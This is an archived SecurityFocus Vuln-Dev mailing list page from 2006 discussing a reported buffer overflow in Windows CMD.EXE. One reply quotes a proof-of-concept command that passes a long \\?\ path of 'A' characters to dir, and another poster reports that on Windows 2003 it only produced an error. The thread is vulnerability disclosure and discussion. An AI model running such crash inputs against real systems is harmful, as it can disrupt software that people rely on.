Vuln Dev
Windows Command Processor CMD.EXE Buffer Overflow Oct 19 2006 03:33AM
gregory_panakkal (gregory_panakkal fastmail fm) (2 replies)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 11:51AM
Osvaldo Casagrande (ocasagrande diviserv com) (2 replies)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 21 2006 02:05PM
RockyH (rocky he g-wizinnovations com)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 10:51PM
Marvin Simkin (Marvin Simkin asu edu) (2 replies)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 21 2006 12:22PM
gregory_panakkal (gregory_panakkal fastmail fm) (2 replies)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 23 2006 03:05PM
Marvin Simkin (Marvin Simkin asu edu)
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 22 2006 01:01PM
Dan Yefimov (dan ns15 lightwave net ru) (2 replies)
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 22 2006 10:24PM
Danux (danuxx gmail com)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 22 2006 07:56PM
Luis Alberto Cortes Zavala (napasn securitynation com) (1 replies)
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 23 2006 04:51PM
Dan Yefimov (dan ns15 lightwave net ru)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 10:57PM
Marvin Simkin (Marvin Simkin asu edu)
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 08:58AM
The SNiFF (thesniff gmail com) (1 replies)
RE: Windows Command Processor CMD.EXE Buffer Overflow Oct 20 2006 07:33PM
Luis Alberto Cortes Zavala (napasn securitynation com)
YEah! Buffer Overflow Windows XP SP2

I Hill debug this.

Luís Alberto Cortes Zavala
IT / Security Consultant
napa (at) securitynation (dot) com [email concealed]
http://www.securitynation.com

-----Mensaje original-----
De: listbounce (at) securityfocus (dot) com [email concealed] [mailto:listbounce (at) securityfocus (dot) com [email concealed]] En
nombre de The SNiFF
Enviado el: Viernes, 20 de Octubre de 2006 03:58 a.m.
Para: vuln-dev (at) securityfocus (dot) com [email concealed]
Asunto: Re: Windows Command Processor CMD.EXE Buffer Overflow

> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability sake).
>
> %COMSPEC% /K "dir
>
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)

Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus